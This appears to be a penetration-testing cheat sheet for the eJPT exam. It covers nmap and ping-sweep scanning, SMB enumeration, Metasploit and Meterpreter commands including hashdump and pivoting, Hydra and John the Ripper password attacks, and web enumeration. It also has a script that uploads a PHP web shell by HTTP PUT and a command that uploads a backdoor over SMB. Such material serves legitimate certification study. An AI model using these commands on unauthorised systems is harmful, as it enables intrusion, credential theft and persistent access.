Disclaimer

This is merely a suggestion based on the tools I personally found useful during the test. I encourage you to take your own notes and tailor your preparation to best suit your needs for the exam.

For additional details about the exam, please refer to my exam review post: eJPT Review

  • Nmap
  • DirBuster
  • nikto
  • WPScan
  • CrackMapExec
  • The Metasploit Framework
  • SearchSploit
  • Hydra

1. Assessment Methodologies


Ping Sweep

fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24

Simple Bash ping sweep:

#!/bin/bash
###ping_sweep.sh
###---------------------------------------------------------------
### Objective: ping every host in a /24 and print the ones that answer
###---------------------------------------------------------------

if [ "$1" == "" ]
then
	echo "PING SWEEP"
	echo "Usage: $0 NETWORK"
	echo "Example: $0 192.168.0"
else
	for host in {1..254};
	do
		# -c 1: a single probe; -W 1: give up after one second so silent hosts do not stall the loop
		ping -c 1 -W 1 "$1.$host" | grep "64 bytes" | cut -d ":" -f 1 | cut -d " " -f 4;
	done
fi

Nmap - Scans

nmap -sS -A 10.10.10.10                        # SYN scan plus -A (OS/version detection, default scripts, traceroute); needs root
nmap --script vuln -p <open ports from the first scan> 10.10.10.10
OS Detection: nmap -Pn -O 10.10.10.10          # -Pn skips host discovery (useful when ICMP is blocked); -O needs root
Quick Scan: nmap -sC -sV 10.10.10.10
Full Scan: nmap -sC -sV -p- 10.10.10.10        # all 65535 TCP ports
UDP Quick Scan: nmap -sU -sV 10.10.10.10       # UDP scans are slow; --top-ports 100 keeps them manageable
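The vuln script scan above is meant to run only against the ports the first scan found open. The following shell script is an added example of my own, not code from the original notes: it saves the first scan in grepable format (-oG), parses the open ports out of that file and hands them to --script vuln. The file name first_scan.gnmap and the sample Host line in the comments are made up.

```shell
#!/bin/sh
# Chain the two scans: save the first scan with -oG, pull the open ports out of the
# grepable file and hand them to --script vuln. Added example; file names are made up.
#
# A grepable (-oG) Host line looks like this (constructed sample):
#   Host: 10.10.10.10 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.6p1/, 139/closed/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Samba/  Ignored State: closed (997)

# Print the ports marked open in a .gnmap file as a comma-separated list, e.g. 22,445.
# Only the state "open" counts; "open|filtered" (common with -sU) is deliberately skipped.
# Ports of every host in the file are merged, so keep one file per target.
open_ports_from_gnmap() {
    grep '^Host:' "$1" \
        | grep -o '[0-9][0-9]*/open/' \
        | cut -d / -f 1 \
        | sort -un \
        | paste -s -d , -
}

# First scan (SYN + version detection, grepable copy), then the vuln scripts only on what is open.
vuln_scan() {
    target="$1"
    gnmap="${2:-first_scan.gnmap}"
    nmap -sS -sV -oG "$gnmap" "$target" >/dev/null || return 1
    ports=$(open_ports_from_gnmap "$gnmap")
    if [ -z "$ports" ]; then
        echo "no open ports recorded in $gnmap" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    nmap --script vuln -p "$ports" "$target"
}

# usage: sh chain_scan.sh 10.10.10.10 [first_scan.gnmap]
if [ $# -ge 1 ]; then
    vuln_scan "$@"
fi
```

Both nmap invocations need root for -sS; if you already have a grepable file from the -sS -A scan, call open_ports_from_gnmap on it directly and paste the result into -p.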

SMB Enumeration


enum4linux

enum4linux -a <ip>      # Enumerating using enum4linux tool

smbclient

smbclient -L //<TARGET_IP> -N    # List available shares with a null session (-N: no password)
smbclient //<TARGET_IP>/IPC$ -N     # Connect to a share

smbmap

smbmap -u guest -p "" -d . -H <TARGET_IP>

smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP>

## Run a command (needs an account with admin rights on the target)
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content (C$ is the admin share, so this also needs admin rights)
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt'

Metasploit

# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor

2. Host & Network Auditing


Checking Routes

ip route    # Checking defined routes in linux
route       # Checking defined routes in linux
route print     # Checking defined routes in windows

Adding Manual Routes

ip route add <subnet> via <gateway or router address>

Finding Mac Addresses

ipconfig /all       # windows
ifconfig        # *nix OSs
ip addr     # linux

Checking ARP Cache

arp -a      # Windows
arp     # *nix OSs
ip neighbour        # Linux

Checking for Listening Ports On a Host

#Windows
netstat -ano        # -a all sockets, -n numeric addresses, -o owning PID
Get-NetTCPConnection | where {$_.State -eq 'Listen'}

#Linux
netstat -tulnp      # -l restricts the output to listening sockets; -p shows the owning process (root needed to see other users' processes)
lsof -i -P -n | grep LISTEN
ss -tulnp

3. Host & Network Penetration Testing


Use the information gathered in phases 1 and 2 to identify a vulnerable attack vector.

Below are some helpful vulnerability assessment resources:

  • Searchsploit
  • ExploitDB
  • Msfconsole search command
  • Google
  • Nessus

Reverse Shell

Excellent online reverse shell generator:

Online - Reverse Shell Generator

Encode/Decode

CyberChef

Metasploit Basic Commands

search x
use x
info
show options, show advanced
set X (e.g. set RHOSTS 10.10.10.10, set payload x; show options tells you the exact option names a module expects)

Meterpreter

#Autoroute
meterpreter > run autoroute -s <subnet>      # route traffic for <subnet> through this session (pivoting)
meterpreter > run autoroute -p               # show active route table

#Basic Commands

background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc; only works from an already elevated session, otherwise elevate first)
use exploit/windows/local/bypassuac (UAC bypass is a msfconsole module, not a meterpreter command: background the session, set SESSION <id>, then run it)
download x /root/
upload x C:\\Windows
shell
hashdump (needs SYSTEM; from msfconsole: use post/windows/gather/hashdump with set SESSION <id>)

Hydra

hydra -U ftp        # hydra uses a module for each service; -U prints a module's usage and options
hydra -L users.txt -P pass.txt <service://server> <options>
hydra -l admin -P pass.txt -f ftp://10.10.10.10        # -f stops after the first valid password found for user admin
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:Incorrect credentials" -f -V    # HTTP POST form: path:POST body:failure string (text that appears only on a failed login)

John-The-Ripper

john --list=formats
john --incremental --users=<users list> <file to crack>       # crack only certain users from the password database (for Linux accounts, first merge /etc/passwd and /etc/shadow with unshadow)
john --show crackme     # show cracked passwords after the session has finished, where crackme is the password database file
john --wordlist=<wordlist> <file to crack>
john --wordlist=<wordlist> --rules <file to crack>        # rules mangle each wordlist entry, e.g. cat becomes c@t, caT, CAT, CaT

4. Web Application Penetration Testing

Information Gathering

Wappalyzer (browser extension)
whatweb <HOST>
nikto -h <HOST>
whois <HOST>
whois <IP>
dnsrecon -d <HOST>
nc -v 10.10.10.10 port      # then type the request below and press Enter twice
HEAD / HTTP/1.0

OpenSSL for HTTPS services

openssl s_client -connect 10.10.10.10:443      # then send: HEAD / HTTP/1.0 followed by an empty line

Httprint

httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt

HTTP Verbs

GET, POST, HEAD, PUT, DELETE, OPTIONS

Use OPTIONS to check which other verbs the server allows (the Allow header in the response lists them):

nc 10.10.10.10 80
OPTIONS / HTTP/1.0

If PUT is allowed, it can be used to upload a PHP shell. First determine the size of the file in bytes (wc -c, not wc -m, since Content-Length is a byte count), then send the PUT request with that value in the Content-Length header, followed by an empty line and the file contents. With a wrong length the server truncates the body or waits for data that never comes.

wc -c shell.php
N shell.php

PUT /shell.php HTTP/1.0
Content-Type: text/html
Content-Length: N

<contents of shell.php>
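Typing the PUT request by hand is easy to get wrong (a miscounted Content-Length, a missing empty line after the headers). The following shell script is an added example of my own, not code from the original notes: it builds the request with the byte count taken from wc -c, sends it with netcat and checks the status line of the reply. The target host 10.10.10.10, the path /shell.php and the netcat -w timeout are assumptions.

```shell
#!/bin/sh
# Upload a file with HTTP PUT over a raw socket, with a correct Content-Length.
# Added example, not from the original notes; host, path and timeout are placeholders.

# Emit a complete HTTP/1.0 PUT request for FILE to TARGET_PATH on HOST.
# Content-Length is a byte count, so it comes from wc -c; wc -m counts characters and
# undercounts as soon as the file contains multibyte UTF-8, which makes the server truncate the body.
build_put_request() {
    file="$1"; target_path="$2"; host="${3:-10.10.10.10}"
    length=$(wc -c < "$file" | tr -d ' ')
    printf 'PUT %s HTTP/1.0\r\n' "$target_path"
    printf 'Host: %s\r\n' "$host"
    printf 'Content-Type: text/html\r\n'
    printf 'Content-Length: %s\r\n' "$length"
    printf '\r\n'                       # empty line separates headers from the body
    cat "$file"                         # body: exactly $length bytes
}

# Return 0 when the status line of a raw HTTP response says the upload was stored
# (201 Created is typical; 200 and 204 also occur), 1 otherwise (e.g. 405 Method Not Allowed).
put_accepted() {
    status=$(printf '%s\n' "$1" | head -n 1 | tr -d '\r' | cut -d ' ' -f 2)
    case "$status" in
        200|201|204) return 0 ;;
        *) return 1 ;;
    esac
}

# Send the request with netcat and report the outcome. -w 5: give up after 5 s of silence.
put_file() {
    response=$(build_put_request "$1" "$2" "$3" | nc -w 5 "$3" "${4:-80}")
    printf '%s\n' "$response" | head -n 1
    put_accepted "$response"
}

# usage: put_file shell.php /shell.php 10.10.10.10 80
# then verify the upload, e.g. curl 'http://10.10.10.10/shell.php?cmd=id'
```

A 2xx answer only means the file was stored; whether it executes depends on the server handling .php in that directory, so always fetch it afterwards.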

Directory and File Scanning

dirsearch.py -u http://10.10.10.10 -e *
gobuster dir -u http://10.10.10.10 -w /path/to/wordlist.txt
ffuf -w /path/to/wordlist.txt:FUZZ -u http://www.evil.com/FUZZ
dirb http://<IP>/
dirbuster &        # GUI tool; & keeps the terminal usable